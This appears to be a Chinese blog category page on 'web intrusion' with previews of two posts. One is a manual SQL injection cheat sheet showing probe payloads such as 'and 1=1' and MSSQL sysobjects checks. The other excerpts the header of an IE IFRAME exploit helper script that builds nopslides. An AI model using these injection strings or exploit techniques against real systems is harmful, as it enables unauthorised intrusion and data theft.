web入侵
文章平均质量分 81
lvlv526
这个作者很懒,什么都没留下…
展开
-
手动方式SQL注入脚本命令之精华版
手动方式SQL注入脚本命令之精华版1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符and [查询条件] and = 4.搜索时没过滤参数的and [查询条件] and %25= 5.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql原创 2007-03-13 15:53:00 · 937 阅读 · 0 评论 -
IE的IFRAME漏洞
[受影响系统]: Microsoft Internet Explorer [ 漏洞 描述]: // Win32 MSIE exploit helper script, creates a lot of nopslides to land in // and/or use as return address. Thanks to blazde for feedback and idears. /原创 2007-04-15 19:53:00 · 962 阅读 · 0 评论